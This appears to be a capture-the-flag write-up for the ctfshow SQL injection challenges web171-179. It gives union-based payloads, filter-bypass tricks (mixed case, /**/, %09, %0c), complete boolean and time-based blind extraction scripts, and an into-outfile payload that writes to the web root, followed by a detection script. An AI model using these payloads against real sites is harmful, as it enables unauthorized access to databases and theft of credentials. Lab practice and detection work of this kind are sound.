A bit of a mixed bag...
SQL injection
web171-173
Run the standard six-step routine on these:
1' order by 3 -- -
1' union select 1,2,database() -- -
(# cannot be used as the comment here, so start with -- -)
Dump column names: 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user'--+
Query the table: 1' union select 1,2,group_concat(password) from ctfshow_user--+
web174
This one is more interesting.
Look at the challenge first.
It filters "flag" and digits, case-sensitively.
Solution 1: nested replace()
This challenge has only two echo points. Since the earlier steps are the same as before, we go straight to the last step:
1' union select 'q',(select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','q'),'2','w'),'3','e'),'4','r'),'5','t'),'6','y'),'7','u'),'8','i'),'9','o'),'0','p') from ctfshow_user4 where username='flag')--+
We can see both upper- and lowercase letters, because the value was first converted to hex and then its digits were replaced with lowercase letters.
So the lowercase letters still have to be mapped back to digits. We do that conversion in a database.
Finally, convert the hex back to a string.
Solution 2: boolean-based blind injection script
# @Author:Y4tacker
import requests

url = "http://e076200d-5e74-4121-b2fc-04153243f7a3.chall.ctf.show/api/v4.php?id=1' and "
result = ''
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    # binary search over the printable ASCII range for the i-th character
    while head < tail:
        mid = (head + tail) >> 1
        payload = f'1=if(ascii(substr((select password from ctfshow_user4 limit 24,1),{i},1))>{mid},1,0) -- -'
        r = requests.get(url + payload)
        if "admin" in r.text:  # condition true: the normal row is echoed back
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break  # no character found: end of the string
    print(result)
web175
// check whether the result contains the flag
if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
    $ret['msg']='查询成功';
}
Solution 1: time-based blind injection script
# @Author:Y4tacker
import requests

url = "http://7eac161c-e06e-4d48-baa5-f11edaee7d38.chall.ctf.show/api/v5.php?id=1' and "
result = ''
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    # binary search over the printable ASCII range for the i-th character
    while head < tail:
        mid = (head + tail) >> 1
        payload = f'1=if(ascii(substr((select password from ctfshow_user5 limit 24,1),{i},1))>{mid},sleep(2),0) -- -'
        try:
            r = requests.get(url + payload, timeout=0.5)
            tail = mid  # answered quickly: condition false
        except Exception as e:
            head = mid + 1  # timed out: sleep(2) ran, condition true
    if head != 32:
        result += chr(head)
    else:
        break  # no character found: end of the string
    print(result)
Solution 2: use file write to drop the result into the web root
http://7eac161c-e06e-4d48-baa5-f11edaee7d38.chall.ctf.show/api/v5.php?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10
Then visit
http://7eac161c-e06e-4d48-baa5-f11edaee7d38.chall.ctf.show/1.txt
web176 case filtering
Solution 1: the universal password gives the result directly
Solution 2: mixed case to get past the case filter
1' uNion Select 1,2,3--+
1' uNion Select 1,2,password from ctfshow_user--+
web177
Spaces are filtered; bypass with /**/
(for the # comment, use %23)
1'/**/union/**/select/**/password,1,1/**/from/**/ctfshow_user/**/where/**/username/**/='flag'%23
web178
Spaces and the * character are filtered; bypass with %09
1'%09union%09select%091,2,password%09from%09ctfshow_user%23
web179
One line: alternatively, %0c in place of %09
1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%23
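Added example (my own code, not from this writeup): a small detector that URL-decodes request lines, folds the whitespace substitutes used in web177-179 (/**/, %09, %0c) back to a single space, and then flags the union-based and blind-injection shapes seen in the scripts above. The log lines are constructed samples and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not taken from any real server log).
SAMPLE_LOGS = [
    "/api/v4.php?id=1",
    "/api/v4.php?id=1'/**/union/**/select/**/password,1,1/**/from/**/ctfshow_user%23",
    "/api/v4.php?id=1'%09union%09select%091,2,password%09from%09ctfshow_user%23",
    "/api/v4.php?id=1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%23",
    "/api/v4.php?id=1'+and+1=if(ascii(substr((select+password+from+ctfshow_user4+limit+24,1),3,1))>96,sleep(2),0)+--+-",
    "/search.php?q=select+your+plan",
]

# Inline /* */ comments and every whitespace character (tab, form feed, ...)
# act as token separators in MySQL; collapse all of them to one plain space.
_SEPARATORS = re.compile(r"(/\*.*?\*/|\s+)")

# Hypothetical signature names; patterns match the normalized query text.
_SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "boolean_blind": re.compile(r"\bif\s*\(\s*ascii\s*\(\s*substr"),
    "time_blind": re.compile(r"\b(sleep|benchmark)\s*\("),
    "comment_tail": re.compile(r"(--\s.*|#.*|/\*.*)$"),
}


def normalize(query: str) -> str:
    """Decode twice (catches %2523-style double encoding), lowercase,
    and collapse comment/whitespace variants to a single space."""
    decoded = unquote_plus(unquote_plus(query))
    return _SEPARATORS.sub(" ", decoded.lower()).strip()


def classify(request_line: str) -> list[str]:
    """Return the signature names matched by one request line."""
    query = request_line.split("?", 1)[1] if "?" in request_line else ""
    text = normalize(query)
    return [name for name, rx in _SIGNATURES.items() if rx.search(text)]


def scan(lines):
    """Map each flagged request line to the signatures it triggered."""
    flagged = {}
    for line in lines:
        hits = classify(line)
        if hits:
            flagged[line] = hits
    return flagged
```

Run over a real log, the `comment_tail` hit alone is noisy; the union or blind signatures together with a burst of near-identical requests differing only in the substr index are the stronger signal.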